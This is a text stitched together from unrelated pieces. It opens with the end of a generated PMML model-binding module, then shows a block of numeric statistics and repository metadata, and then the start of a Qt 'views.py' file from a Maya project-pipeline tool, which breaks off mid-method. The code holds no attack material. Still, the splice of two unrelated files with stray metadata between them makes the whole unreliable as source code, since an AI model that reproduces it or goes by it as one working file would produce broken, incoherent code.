    def PMML_init(self, version=None, Header=None, MiningBuildTask=None, DataDictionary=None, TransformationDictionary=None, AssociationModel=None, AnomalyDetectionModel=None, BayesianNetworkModel=None, BaselineModel=None, ClusteringModel=None, GaussianProcessModel=None, GeneralRegressionModel=None, MiningModel=None, NaiveBayesModel=None, NearestNeighborModel=None, NeuralNetwork=None, RegressionModel=None, RuleSetModel=None, SequenceModel=None, Scorecard=None, SupportVectorMachineModel=None, TextModel=None, TimeSeriesModel=None, TreeModel=None, Extension=None):
        self.original_tagname_ = None
        self.version = supermod._cast(None, version)
        self.Header = Header
        self.MiningBuildTask = MiningBuildTask
        self.DataDictionary = DataDictionary
        self.TransformationDictionary = TransformationDictionary
        # Each model-list attribute defaults to a fresh empty list when
        # the caller passes None (never a shared mutable default).
        for attr_name, attr_value in (
            ('AssociationModel', AssociationModel),
            ('AnomalyDetectionModel', AnomalyDetectionModel),
            ('BayesianNetworkModel', BayesianNetworkModel),
            ('BaselineModel', BaselineModel),
            ('ClusteringModel', ClusteringModel),
            ('GaussianProcessModel', GaussianProcessModel),
            ('GeneralRegressionModel', GeneralRegressionModel),
            ('MiningModel', MiningModel),
            ('NaiveBayesModel', NaiveBayesModel),
            ('NearestNeighborModel', NearestNeighborModel),
            ('NeuralNetwork', NeuralNetwork),
            ('RegressionModel', RegressionModel),
            ('RuleSetModel', RuleSetModel),
            ('SequenceModel', SequenceModel),
            ('Scorecard', Scorecard),
            ('SupportVectorMachineModel', SupportVectorMachineModel),
            ('TextModel', TextModel),
            ('TimeSeriesModel', TimeSeriesModel),
            ('TreeModel', TreeModel),
            ('Extension', Extension),
        ):
            setattr(self, attr_name, [] if attr_value is None else attr_value)

    ArrayType.__init__ = ArrayType_init
    Annotation.__init__ = _mixed_text_init
    Timestamp.__init__ = _mixed_text_init
    PMML.__init__ = PMML_init
# Install the wrapper constructors at import time; parse() temporarily
# switches back to the generated originals while parseSub runs.
new_init()
def showIndent(outfile, level, pretty_print=True):
    """Write *level* tab characters to *outfile* when pretty-printing.

    Writes nothing when *pretty_print* is false.
    """
    if not pretty_print:
        return
    outfile.write('\t' * level)
| 38.051724
| 568
| 0.624377
| 940
| 11,035
| 7.171277
| 0.075532
| 0.07714
| 0.078623
| 0.027296
| 0.960688
| 0.947931
| 0.947931
| 0.945854
| 0.945854
| 0.945854
| 0
| 0.001043
| 0.30512
| 11,035
| 289
| 569
| 38.183391
| 0.878065
| 0
| 0
| 0.934307
| 0
| 0
| 0.000453
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.043796
| false
| 0
| 0
| 0
| 0.047445
| 0.007299
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
16a979b5ecb6ecadf866a52166f3000e7638d4d1
| 121,829
|
py
|
Python
|
libs/views.py
|
ddv0504/pipeline
|
9626871a3d030a2f075530ec0a567cee22fad586
|
[
"MIT"
] | null | null | null |
libs/views.py
|
ddv0504/pipeline
|
9626871a3d030a2f075530ec0a567cee22fad586
|
[
"MIT"
] | null | null | null |
libs/views.py
|
ddv0504/pipeline
|
9626871a3d030a2f075530ec0a567cee22fad586
|
[
"MIT"
] | null | null | null |
'''
PIPELINE 2
Project manager for Maya
Author: Lior Ben Horin
All rights reserved (c) 2017
pipeline.nnl.tv
liorbenhorin@gmail.com
---------------------------------------------------------------------------------------------
install:
Place the pipeline folder in your maya scripts folder and run this code (in python):
import pipeline
pipeline.start()
---------------------------------------------------------------------------------------------
You are using pipeline at your own risk.
Things can always go wrong, and under no circumstances the author
would be responsible for any damages caused from the use of this software.
When using this beta program you hereby agree to allow this program to collect
and send usage data to the author.
---------------------------------------------------------------------------------------------
The coded instructions, statements, computer programs, and/or related
material (collectively the "Data") in these files are subject to the terms
and conditions defined by
Creative Commons Attribution-NonCommercial-NoDerivs 4.0 Unported License:
http://creativecommons.org/licenses/by-nc-nd/4.0/
http://creativecommons.org/licenses/by-nc-nd/4.0/legalcode
http://creativecommons.org/licenses/by-nc-nd/4.0/legalcode.txt
---------------------------------------------------------------------------------------------
'''
#
# import cPickle
import os
import functools
import logging
import pipeline.libs.config as cfg
import pipeline.libs.data as dt
import pipeline.libs.misc as misc
import pipeline.libs.models as models
import pipeline.libs.serializer as serializer
import pipeline.widgets.inputs as inputs
from pipeline.libs.Qt import QtGui, QtWidgets, QtCore, QtCompat
import pipeline.apps.massage as massage
from pipeline.libs import permissions
import pipeline.CSS
from pipeline.CSS import loadCSS
logger = logging.getLogger(__name__)
global counter
class Hierarchy_file_type_delegate(QtWidgets.QItemDelegate):
    """Item delegate offering a Maya file-type choice.

    Draws a thin light-gray separator under each cell and edits the
    cell with a fixed (non-editable) combo box listing the two Maya
    scene formats.
    """

    def __init__(self, parent):
        super(Hierarchy_file_type_delegate, self).__init__(parent)
        self.cb = None  # kept for parity with the sibling delegates

    def paint(self, painter, option, index):
        # Underline the row with a subtle separator, then defer to the
        # default item painting.
        painter.save()
        separator_pen = QtGui.QPen(QtGui.QColor(cfg.colors.LIGHT_GRAY_minus), 0.5)
        painter.setPen(separator_pen)
        painter.drawLine(option.rect.bottomLeft(), option.rect.bottomRight())
        painter.restore()
        super(Hierarchy_file_type_delegate, self).paint(painter, option, index)

    def createEditor(self, parent, option, index):
        combo = QtWidgets.QComboBox(parent)
        combo.setStyleSheet("")
        combo.setEditable(False)
        combo.addItems(["mayaAscii", "mayaBinary"])
        return combo

    def setEditorData(self, editor, index):
        current = index.data(QtCore.Qt.EditRole)
        found = editor.findText(current)
        # Fall back to the first entry when the model text is unknown.
        editor.setCurrentIndex(found if found >= 0 else 0)

    def setModelData(self, editor, model, index):
        model.setData(index, editor.currentText(), QtCore.Qt.EditRole)
class Hierarchy_branches_delegate(QtWidgets.QItemDelegate):
    """Editable combo-box delegate listing ASK_USER plus the view's branches.

    The owning view must expose a ``branches`` attribute; the editor offers
    those names alongside the ASK_USER sentinel.
    """

    def __init__(self, parent):
        QtWidgets.QItemDelegate.__init__(self, parent)
        self.cb = None  # kept for interface parity; not used internally

    def paint(self, painter, option, index):
        # Thin bottom border, then the default cell rendering on top.
        painter.save()
        separator_pen = QtGui.QPen(QtGui.QColor(cfg.colors.LIGHT_GRAY_minus), 0.5)
        painter.setPen(separator_pen)
        painter.drawLine(option.rect.bottomLeft(), option.rect.bottomRight())
        painter.restore()
        super(Hierarchy_branches_delegate, self).paint(painter, option, index)

    def createEditor(self, parent, option, index):
        combo = QtWidgets.QComboBox(parent)
        combo.setStyleSheet("")
        combo.setEditable(True)
        combo.addItems([cfg.Hierarcy_options.ASK_USER] + self.parent().branches)
        return combo

    def setEditorData(self, editor, index):
        stored = index.data(QtCore.Qt.EditRole)
        position = editor.findText(stored)
        # Unknown stored text falls back to the first entry.
        editor.setCurrentIndex(position if position >= 0 else 0)

    def setModelData(self, editor, model, index):
        model.setData(index, editor.currentText(), QtCore.Qt.EditRole)
class Hierarchy_name_delegate(QtWidgets.QItemDelegate):
    """Editable combo-box delegate offering the current value and ASK_USER."""

    def __init__(self, parent):
        QtWidgets.QItemDelegate.__init__(self, parent)
        self.cb = None  # kept for interface parity; not used internally

    def paint(self, painter, option, index):
        # Thin bottom border, then the default cell rendering on top.
        painter.save()
        separator_pen = QtGui.QPen(QtGui.QColor(cfg.colors.LIGHT_GRAY_minus), 0.5)
        painter.setPen(separator_pen)
        painter.drawLine(option.rect.bottomLeft(), option.rect.bottomRight())
        painter.restore()
        super(Hierarchy_name_delegate, self).paint(painter, option, index)

    def createEditor(self, parent, option, index):
        combo = QtWidgets.QComboBox(parent)
        combo.setStyleSheet("")
        combo.setEditable(True)
        # First entry is the cell's current value; second lets the user
        # defer the choice (ASK_USER sentinel).
        combo.addItems([str(index.data()), cfg.Hierarcy_options.ASK_USER])
        return combo

    def setEditorData(self, editor, index):
        stored = str(index.data(QtCore.Qt.EditRole))
        position = editor.findText(stored)
        # Unknown stored text falls back to the first entry.
        editor.setCurrentIndex(position if position >= 0 else 0)

    def setModelData(self, editor, model, index):
        model.setData(index, editor.currentText(), QtCore.Qt.EditRole)
class Hierarchy_quantitiy_delegate(QtWidgets.QItemDelegate):
    """Combo-box delegate for the quantity column (SINGLE or MULTIPLE)."""

    def __init__(self, parent):
        QtWidgets.QItemDelegate.__init__(self, parent)
        self.cb = None  # kept for interface parity; not used internally

    def paint(self, painter, option, index):
        # Thin bottom border, then the default cell rendering on top.
        painter.save()
        separator_pen = QtGui.QPen(QtGui.QColor(cfg.colors.LIGHT_GRAY_minus), 0.5)
        painter.setPen(separator_pen)
        painter.drawLine(option.rect.bottomLeft(), option.rect.bottomRight())
        painter.restore()
        super(Hierarchy_quantitiy_delegate, self).paint(painter, option, index)

    def createEditor(self, parent, option, index):
        combo = QtWidgets.QComboBox(parent)
        combo.setStyleSheet("")
        combo.addItems([cfg.Hierarcy_options.SINGLE, cfg.Hierarcy_options.MULTIPLE])
        return combo

    def setEditorData(self, editor, index):
        stored = index.data(QtCore.Qt.EditRole)
        position = editor.findText(stored)
        # Unknown stored text falls back to the first entry.
        editor.setCurrentIndex(position if position >= 0 else 0)

    def setModelData(self, editor, model, index):
        model.setData(index, editor.currentText(), QtCore.Qt.EditRole)
class RoleComboBoxDelegate(QtWidgets.QItemDelegate):
    """Combo-box delegate that edits a user's role from the known role names.

    The role names come from ``permissions.Permissions.roles``.
    """

    def __init__(self, parent):
        QtWidgets.QItemDelegate.__init__(self, parent)
        self.cb = None  # kept for interface parity with the sibling delegates

    def createEditor(self, parent, option, index):
        cb = QtWidgets.QComboBox(parent)
        # dict.keys() returns a view object under Python 3; QComboBox.addItems
        # requires a concrete sequence of strings, so materialize it.
        cb.addItems(list(permissions.Permissions.roles.keys()))
        return cb

    def setEditorData(self, editor, index):
        cb = editor
        string = index.data(QtCore.Qt.EditRole)
        i = cb.findText(string)
        if i >= 0:
            cb.setCurrentIndex(i)
        else:
            # Unknown stored role: fall back to the first entry.
            cb.setCurrentIndex(0)

    def setModelData(self, editor, model, index):
        cb = editor
        model.setData(index, cb.currentText(), QtCore.Qt.EditRole)
class LinkProjectButtonDelegate(QtWidgets.QItemDelegate):
    # Delegate that lazily installs a "Link"/"Online" push button into each
    # cell of its column the first time the cell is painted. The button's
    # action depends on whether the project node is currently online.
    def __init__(self, parent):
        # Parent is required: paint() reaches back into the owning view.
        QtWidgets.QItemDelegate.__init__(self, parent)
    def paint(self, painter, option, index):
        # Build the widget only once per cell; afterwards the installed
        # index widget paints itself.
        if not self.parent().indexWidget(index):
            # NOTE(review): 'id' shadows the builtin; it is a source index
            # mapped from the proxy index.
            id = self.parent().model().mapToSource(index)
            project = self.parent().model().sourceModel().getNode(id)
            if not project.online():
                # Offline project: clicking links it.
                label = "Link"
                icon = cfg.link_off_icon
                func = self.parent().linkProject
            else:
                # Online project: button is informational (no-op handler).
                label = "Online"
                icon = cfg.link_on_icon
                func = self.parent().dummy
            # NOTE(review): three positional args only loosely match the
            # QPushButton(icon, text, parent) overload -- confirm that
            # index.data() is intended as the text argument here.
            button = QtWidgets.QPushButton(
                label,
                index.data(),
                self.parent(),
                clicked=func
            )
            button.setStyleSheet(cfg.table_button_stylesheet)
            button.setIconSize(QtCore.QSize(20, 20))
            button.setIcon(QtGui.QIcon(icon))
            self.parent().setIndexWidget(index, button)
class EditProjectButtonDelegate(QtWidgets.QItemDelegate):
    # Delegate that lazily installs an "Edit" push button into each cell of
    # its column. The button is disabled unless the current user validates
    # as an administrator of the project on that row.
    def __init__(self, parent):
        # Parent is required: paint() reaches back into the owning view.
        QtWidgets.QItemDelegate.__init__(self, parent)
    def paint(self, painter, option, index):
        # Build the widget only once per cell; afterwards the installed
        # index widget paints itself.
        if not self.parent().indexWidget(index):
            label = "Edit"
            icon = cfg.edit_icon
            # NOTE(review): three positional args only loosely match the
            # QPushButton(icon, text, parent) overload -- confirm that
            # index.data() is intended as the text argument here.
            button = QtWidgets.QPushButton(
                label,
                index.data(),
                self.parent(),
                clicked=self.parent().editProject
            )
            button.setIconSize(QtCore.QSize(20, 20))
            button.setIcon(QtGui.QIcon(icon))
            button.setStyleSheet(cfg.table_button_stylesheet)
            index_ = self.parent().model().mapToSource(index)
            project = self.parent().model().sourceModel().getNode(index_)
            enable = True
            if project.project_users:
                # Credentials come from the pipeline window settings:
                # user[0] is the name, user[1] the password.
                user = self.parent().parent.pipeline_window.settings.user[0]
                password = self.parent().parent.pipeline_window.settings.user[1]
                role = project.validate_user(user, password)
                # Only administrators may edit a project that has users.
                if role != 'administrator':
                    enable = False
            button.setEnabled(enable)
            self.parent().setIndexWidget(index, button)
class SetProjectButtonDelegate(QtWidgets.QItemDelegate):
    # Delegate that lazily installs a "Set project" push button into each
    # cell of its column, wired to the view's setProject slot.
    def __init__(self, parent):
        # Parent is required: paint() reaches back into the owning view.
        QtWidgets.QItemDelegate.__init__(self, parent)
    def paint(self, painter, option, index):
        # Build the widget only once per cell; afterwards the installed
        # index widget paints itself.
        if not self.parent().indexWidget(index):
            label = "Set project"
            icon = cfg.set_icon
            # NOTE(review): three positional args only loosely match the
            # QPushButton(icon, text, parent) overload -- confirm that
            # index.data() is intended as the text argument here.
            button = QtWidgets.QPushButton(
                label,
                index.data(),
                self.parent(),
                clicked=self.parent().setProject
            )
            button.setIconSize(QtCore.QSize(20, 20))
            button.setIcon(QtGui.QIcon(icon))
            button.setStyleSheet(cfg.table_button_stylesheet)
            self.parent().setIndexWidget(index, button)
# class Notes_View(QtWidgets.QTableView):
# def __init__(self, parent=None):
# super(Notes_View, self).__init__(parent)
# self.setSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Expanding)
# self.setWordWrap(True)
#
# def setModel(self, model=None):
# super(Notes_View, self).setModel(model)
#
# self.horizontalHeader().resizeSection(0, 50)
#
# QtCompat.setSectionResizeMode(self.horizontalHeader(), 0, QtWidgets.QHeaderView.Fixed)
#
#
# self.horizontalHeader().resizeSection(1, 100)
# QtCompat.setSectionResizeMode(self.horizontalHeader(), 1, QtWidgets.QHeaderView.Fixed)
#
# QtCompat.setSectionResizeMode(self.horizontalHeader(), 2, QtWidgets.QHeaderView.ResizeToContents)
#
#
# self.horizontalHeader().setStretchLastSection(True)
#
# class Project_Levels_View(QtWidgets.QTableView):
# def __init__(self, parent=None):
# super(Project_Levels_View, self).__init__(parent)
#
# self.verticalHeader().setHidden(True)
# self.setSelectionMode(QtWidgets.QAbstractItemView.SingleSelection)
#
# def setModel(self, model=None):
# super(Project_Levels_View, self).setModel(model)
#
#
# self.horizontalHeader().resizeSection(0, 30)
#
# QtCompat.setSectionResizeMode(self.horizontalHeader(), 0, QtWidgets.QHeaderView.Fixed)
#
# for i in range(1, self.horizontalHeader().count()):
#
# QtCompat.setSectionResizeMode(self.horizontalHeader(), i, QtWidgets.QHeaderView.ResizeToContents)
#
# self.horizontalHeader().setStretchLastSection(True)
#
class Project_Users_View(QtWidgets.QTableView):
    """Table view of a project's users with an editable role column.

    Column 2 (role) is edited through RoleComboBoxDelegate. A context menu
    offers adding, removing, and bulk-importing users from a JSON file.
    """

    def __init__(self, parent=None):
        super(Project_Users_View, self).__init__(parent)
        self.setSelectionMode(QtWidgets.QAbstractItemView.SingleSelection)

    def setModel(self, model=None):
        super(Project_Users_View, self).setModel(model)
        # Column 2 holds the user's role; edit it through a combo box.
        self.setItemDelegateForColumn(2, RoleComboBoxDelegate(self))
        QtCompat.setSectionResizeMode(self.horizontalHeader(), QtWidgets.QHeaderView.Stretch)
        self.setEditTriggers(QtWidgets.QAbstractItemView.AllEditTriggers)

    def contextMenuEvent(self, event):
        """Context menu: new user, import users, and (on a valid row) remove user."""
        index = self.indexAt(event.pos())
        menu = QtWidgets.QMenu()
        actions = []
        actions.append(QtWidgets.QAction("New user", menu, triggered=functools.partial(self.new_user, index)))
        actions.append(QtWidgets.QAction("Import users from a json file", menu, triggered=self.import_users))
        if index.isValid():
            actions.append(QtWidgets.QAction("Remove user", menu, triggered=functools.partial(self.remove_user, index)))
        menu.addActions(actions)
        menu.exec_(event.globalPos())
        event.accept()  # tell Qt the event is handled
        return

    def remove_user(self, index):
        """Remove the user row at *index* from the model."""
        row = index.row()
        parent = index.parent()
        self.model().removeRows(row, 1, parent)

    def new_user(self, index):
        """Insert a fresh default (admin) user after *index*, or append at the end."""
        user = dt.UserNode("New user", "1234", cfg._admin_)
        if index.isValid():
            row = index.row()
        else:
            row = len(self.model().items)
        self.model().insertRows(row + 1, 1, QtCore.QModelIndex(), node=user)

    def import_users(self):
        """Load users from a user-chosen JSON file and rebuild the model.

        The file maps user name -> [password, role]; an empty file leaves the
        view without a model.
        """
        path = QtWidgets.QFileDialog.getOpenFileName(self, "Select the users file", filter="json files (*.json)")
        if path[0]:
            users_file = serializer.JSONSerializer(path=str(path[0]))
            users_file = users_file.read()
            # Fix: leftover Python 2 debug `print users_file, "="` replaced
            # with a proper (lazy-formatted) log call.
            logger.debug("imported users file: %s", users_file)
            self.setModel(None)
            users = []
            for key in users_file:
                users.append(dt.UserNode(key, users_file[key][0], users_file[key][1]))
            if users:
                self.setModel(models.Users_Model(users))
class Hierarcy_components_view(QtWidgets.QTableView):
    """Editable table of hierarchy components.

    Column 1 (name) stretches; columns 0/2-5 have fixed widths. Editors are
    the hierarchy combo-box delegates, or Preset_generator_table_Delegate
    when ``delegates=False``. A context menu adds/removes component rows.
    """

    def __init__(self, parentWidget=None, parent=None, branches=None):
        super(Hierarcy_components_view, self).__init__(parent)
        # Fix: the original used `branches=list()` (a shared mutable default);
        # each instance now gets its own list unless the caller supplies one.
        self.branches = branches if branches is not None else []
        # NOTE: assigning self.parent shadows QWidget.parent(); kept because
        # other code reads it as an attribute.
        self.parent = parent
        self.parentWidget = parentWidget
        self.setSelectionMode(QtWidgets.QAbstractItemView.SingleSelection)
        self.setShowGrid(False)
        self.setFocusPolicy(QtCore.Qt.NoFocus)

    def clearModel(self):
        """Detach the current model."""
        self.setModel(None)

    def setModel_(self, model=None, delegates=True):
        """Install *model*, size the columns, and attach editors.

        Returns True when a model was installed, None when *model* is falsy.
        """
        self.clearModel()
        if model:
            self.setModel(model)
            header = self.horizontalHeader()
            # Fix: the original paired resizeSection(5, ...) and
            # resizeSection(4, ...) with setSectionResizeMode(..., 3, ...)
            # (copy/paste slip); each fixed column now gets its own mode.
            header.resizeSection(5, 100)
            QtCompat.setSectionResizeMode(header, 5, QtWidgets.QHeaderView.Fixed)
            header.resizeSection(4, 100)
            QtCompat.setSectionResizeMode(header, 4, QtWidgets.QHeaderView.Fixed)
            header.resizeSection(3, 60)
            QtCompat.setSectionResizeMode(header, 3, QtWidgets.QHeaderView.Fixed)
            header.resizeSection(2, 120)
            QtCompat.setSectionResizeMode(header, 2, QtWidgets.QHeaderView.Fixed)
            header.resizeSection(0, 30)
            QtCompat.setSectionResizeMode(header, 0, QtWidgets.QHeaderView.Fixed)
            # The name column absorbs the remaining width.
            QtCompat.setSectionResizeMode(header, 1, QtWidgets.QHeaderView.Stretch)
            if delegates:
                self.setItemDelegateForColumn(1, Hierarchy_name_delegate(self))
                self.setItemDelegateForColumn(2, Hierarchy_branches_delegate(self))
                self.setItemDelegateForColumn(3, Hierarchy_name_delegate(self))
                self.setItemDelegateForColumn(4, Hierarchy_file_type_delegate(self))
                self.setItemDelegateForColumn(5, Hierarchy_file_type_delegate(self))
            else:
                for column in range(1, 6):
                    self.setItemDelegateForColumn(column, Preset_generator_table_Delegate(self))
            self.setEditTriggers(QtWidgets.QAbstractItemView.AllEditTriggers)
            return True
        self.setModel(None)
        return None

    def contextMenuEvent(self, event):
        """Context menu with Remove/Add component for the row under the cursor."""
        index = self.indexAt(event.pos())
        menu = QtWidgets.QMenu()
        if index.isValid():
            menu.addAction(QtWidgets.QAction("Remove component", menu, triggered=functools.partial(self.remove, index)))
            menu.addAction(QtWidgets.QAction("Add component", menu, triggered=functools.partial(self.add, index)))
        menu.exec_(event.globalPos())
        event.accept()  # tell Qt the event is handled
        return

    def remove(self, index):
        """Delete the component row at *index*."""
        row = index.row()
        parent = index.parent()
        self.model().removeRows(row, 1, parent)

    def add(self, index):
        """Insert a new ASK_USER component after *index* (or append at the end).

        Creates a fresh model when none is installed yet.
        """
        cat = dt.Hierarcy_component_node(name=cfg.Hierarcy_options.ASK_USER, branch=cfg.Hierarcy_options.ASK_USER)
        if self.model():
            if index.isValid():
                row = index.row()
            else:
                row = len(self.model().items)
            self.model().insertRows(row + 1, 1, QtCore.QModelIndex(), node=cat)
        else:
            self.setModel_(models.Hierarchy_component_Model([cat]))
class Hierarcy_catagories_view(QtWidgets.QTableView):
    """Editable table of hierarchy category levels.

    Column 1 (name) stretches; the remaining columns have fixed widths.
    Editors are hierarchy combo-box delegates, or preset-generator editors
    (with the quantity column hidden) when ``delegates=False``. A context
    menu supports reordering and add/remove of category levels.
    """

    def __init__(self, parentWidget=None, parent=None):
        super(Hierarcy_catagories_view, self).__init__(parent)
        # NOTE: assigning self.parent shadows QWidget.parent(); kept because
        # other code reads it as an attribute.
        self.parent = parent
        self.parentWidget = parentWidget
        self.setSelectionMode(QtWidgets.QAbstractItemView.SingleSelection)
        self.setShowGrid(False)
        self.setFocusPolicy(QtCore.Qt.NoFocus)

    def clearModel(self):
        """Detach the current model."""
        self.setModel(None)

    def setModel_(self, model=None, delegates=True):
        """Install *model*, size the columns, and attach editors.

        Returns True when a model was installed, None when *model* is falsy.
        """
        self.clearModel()
        if model:
            self.setModel(model)
            header = self.horizontalHeader()
            # Fix: the original paired resizeSection(7, ...) with
            # setSectionResizeMode(..., 6, ...) (copy/paste slip); each
            # fixed column now gets its own mode. The duplicate Stretch
            # call on column 1 was also collapsed to one.
            header.resizeSection(7, 100)
            QtCompat.setSectionResizeMode(header, 7, QtWidgets.QHeaderView.Fixed)
            header.resizeSection(6, 100)
            QtCompat.setSectionResizeMode(header, 6, QtWidgets.QHeaderView.Fixed)
            header.resizeSection(5, 100)
            QtCompat.setSectionResizeMode(header, 5, QtWidgets.QHeaderView.Fixed)
            header.resizeSection(4, 100)
            QtCompat.setSectionResizeMode(header, 4, QtWidgets.QHeaderView.Fixed)
            header.resizeSection(3, 100)
            QtCompat.setSectionResizeMode(header, 3, QtWidgets.QHeaderView.Fixed)
            header.resizeSection(2, 150)
            QtCompat.setSectionResizeMode(header, 2, QtWidgets.QHeaderView.Fixed)
            header.resizeSection(1, 100)
            header.resizeSection(0, 30)
            QtCompat.setSectionResizeMode(header, 0, QtWidgets.QHeaderView.Fixed)
            # The name column absorbs the remaining width.
            QtCompat.setSectionResizeMode(header, 1, QtWidgets.QHeaderView.Stretch)
            if delegates:
                self.setItemDelegateForColumn(1, Hierarchy_name_delegate(self))
                self.setItemDelegateForColumn(2, Hierarchy_quantitiy_delegate(self))
                self.setItemDelegateForColumn(3, Hierarchy_name_delegate(self))
                self.setItemDelegateForColumn(4, Hierarchy_name_delegate(self))
                self.setItemDelegateForColumn(5, Hierarchy_name_delegate(self))
                self.setItemDelegateForColumn(6, Hierarchy_name_delegate(self))
                self.setItemDelegateForColumn(7, Hierarchy_name_delegate(self))
            else:
                self.setItemDelegateForColumn(7, Preset_generator_table_Delegate(self))
                self.setItemDelegateForColumn(6, Preset_generator_table_Delegate(self))
                self.setItemDelegateForColumn(5, Preset_generator_table_Delegate(self))
                self.setItemDelegateForColumn(4, Preset_generator_table_Delegate(self))
                self.setItemDelegateForColumn(3, Preset_generator_table_Delegate(self))
                self.setItemDelegateForColumn(1, Preset_generator_table_Delegate(self))
                # Quantity is irrelevant in preset mode.
                self.setColumnHidden(2, True)
            self.setEditTriggers(QtWidgets.QAbstractItemView.AllEditTriggers)
            return True
        self.setModel(None)
        return None

    def contextMenuEvent(self, event):
        """Context menu: reorder, remove, or add category levels."""
        index = self.indexAt(event.pos())
        menu = QtWidgets.QMenu()
        if index.isValid():
            menu.addAction(QtWidgets.QAction("Move up", menu, triggered=functools.partial(self.move_up, index)))
            menu.addAction(QtWidgets.QAction("move down", menu, triggered=functools.partial(self.move_down, index)))
            menu.addSeparator()
            menu.addAction(QtWidgets.QAction("Remove category level", menu, triggered=functools.partial(self.remove, index)))
            menu.addAction(QtWidgets.QAction("Add category level", menu, triggered=functools.partial(self.add, index)))
        menu.exec_(event.globalPos())
        event.accept()  # tell Qt the event is handled
        return

    def remove(self, index):
        """Delete the category-level row at *index*."""
        row = index.row()
        parent = index.parent()
        self.model().removeRows(row, 1, parent)

    def add(self, index):
        """Insert a new ASK_USER/SINGLE category level after *index* (or append).

        Creates a fresh model when none is installed yet.
        """
        cat = dt.Hierarcy_folder_node(name=cfg.Hierarcy_options.ASK_USER, quantity=cfg.Hierarcy_options.SINGLE)
        if self.model():
            if index.isValid():
                row = index.row()
            else:
                row = len(self.model().items)
            self.model().insertRows(row + 1, 1, QtCore.QModelIndex(), node=cat)
        else:
            self.setModel_(models.Hierarchy_folders_Model([cat]))

    def move_up(self, index):
        """Move the row at *index* one position up."""
        self.model().move_up(index.row())

    def move_down(self, index):
        """Move the row at *index* one position down."""
        self.model().move_down(index.row())
class Projects_View(QtWidgets.QTableView):
    # Table of pipeline projects shown behind a Projects_ProxyModel.
    # Columns 2-4 host per-row Link/Edit/Set buttons installed by delegates;
    # column 0 is hidden and column 1 stretches.
    def __init__(self, parentWidget=None, parent=None):
        super(Projects_View, self).__init__(parent)
        # NOTE(review): assigning self.parent shadows QWidget.parent();
        # kept because other methods read it as an attribute.
        self.parent = parent
        self.parentWidget = parentWidget
        self.setShowGrid(False)
        # self.setAlternatingRowColors(True)
        self.setSelectionMode(QtWidgets.QAbstractItemView.SingleSelection)
        self.setWordWrap(True)
        QtCompat.setSectionResizeMode(self.verticalHeader(), QtWidgets.QHeaderView.Fixed)
        self.setSelectionBehavior(QtWidgets.QAbstractItemView.SelectRows)
        self.horizontalHeader().hide()
        self.verticalHeader().hide()
        self.setSortingEnabled(True)
        # Set the delegate for column 0 of our table
        # Proxy model is created lazily by setModel_().
        self._proxyModel = None
    def addSlider(self):
        # Attach an icon-size slider under the view and keep icon size synced.
        # NOTE(review): IconScaleSlider is defined elsewhere in the module --
        # confirm it is in scope at call time.
        self._slider = IconScaleSlider(self)
        self.parentWidget.layout().addWidget(self._slider)
        self._slider.listSlider.sliderMoved.connect(self.icons_size)
        self.icons_size(32)
    def icons_size(self, int):
        # Set the row icon size; parameter name 'int' shadows the builtin
        # but is kept as-is (renaming would change the interface).
        self.setIconSize(QtCore.QSize(int, int))
        self.update()
    def clearModel(self):
        # Drop both the view's model and the proxy's source reference so the
        # old source model can be released.
        self.setModel(None)
        if self._proxyModel:
            self._proxyModel.setSourceModel(None)
            self._proxyModel = None
    def setModel_(self, model=None):
        # Install *model* behind a fresh proxy, size the button columns, and
        # attach the button delegates. Returns True on success, None when
        # *model* is falsy.
        self.clearModel()
        if model:
            self._proxyModel = models.Projects_ProxyModel()
            self._proxyModel.setSourceModel(model)
            self.setModel(self._proxyModel)
            # size the load button column
            # NOTE(review): each resizeSection(n, ...) is paired with a mode
            # change on column n+1 -- looks like a copy/paste slip, but the
            # intended columns cannot be confirmed from here; verify before
            # changing.
            self.horizontalHeader().resizeSection(3, 100)
            QtCompat.setSectionResizeMode(self.horizontalHeader(), 4, QtWidgets.QHeaderView.Fixed)
            self.horizontalHeader().resizeSection(2, 100)
            QtCompat.setSectionResizeMode(self.horizontalHeader(), 3, QtWidgets.QHeaderView.Fixed)
            self.horizontalHeader().resizeSection(1, 100)
            QtCompat.setSectionResizeMode(self.horizontalHeader(), 2, QtWidgets.QHeaderView.Fixed)
            #
            # self.horizontalHeader().resizeSection(0, 30)
            # QtCompat.setSectionResizeMode(self.horizontalHeader(), 0, QtWidgets.QHeaderView.Fixed)
            QtCompat.setSectionResizeMode(self.horizontalHeader(), 1, QtWidgets.QHeaderView.Stretch)
            # setup the buttons for loading and more options with delegates
            # self.setItemDelegateForColumn(0, Standard_table_Delegate(self))
            # self.setItemDelegateForColumn(1, Standard_table_Delegate(self))
            self.setItemDelegateForColumn(2, LinkProjectButtonDelegate(self))
            self.setItemDelegateForColumn(3, EditProjectButtonDelegate(self))
            self.setItemDelegateForColumn(4, SetProjectButtonDelegate(self))
            # NOTE(review): a SOURCE-model index is handed to the proxy-backed
            # view here (and index(0, 0, None) passes None as the parent) --
            # presumably works with this model implementation; confirm.
            self.setCurrentIndex(self.model().sourceModel().index(0, 0, None))
            self.setColumnHidden(0, True)
            return True
        self.setModel(None)
        return None
    # self.setCurrentIndex(self.model().index(0,0, None))
    def editProject(self):
        # Slot for the per-row Edit button: resolve the button's cell back to
        # a source index, then open the project editor (or the new-project
        # flow when the first item is the "new" placeholder).
        button = self.sender()
        index = self.indexAt(button.pos())
        index = self.model().mapToSource(index)
        if self.model().sourceModel().items[0].typeInfo() == cfg._new_:
            self.model().sourceModel().items[0].parent().initialVersion()
        else:
            self.model().sourceModel().getNode(index).edit()
        # NOTE(review): 'index' is a source index at this point -- confirm
        # setCurrentIndex on the proxy-backed view is intended.
        self.setCurrentIndex(index)
    def setProject(self):
        # Slot for the per-row "Set project" button; same resolution flow as
        # editProject, but activates the project instead.
        button = self.sender()
        index = self.indexAt(button.pos())
        index = self.model().mapToSource(index)
        if self.model().sourceModel().items[0].typeInfo() == cfg._new_:
            self.model().sourceModel().items[0].parent().initialVersion()
        else:
            self.model().sourceModel().getNode(index).set()
        self.setCurrentIndex(index)
    def linkProject(self):
        # Slot for the per-row Link button: link the project, then refresh
        # the model and repaint so the button flips to "Online".
        button = self.sender()
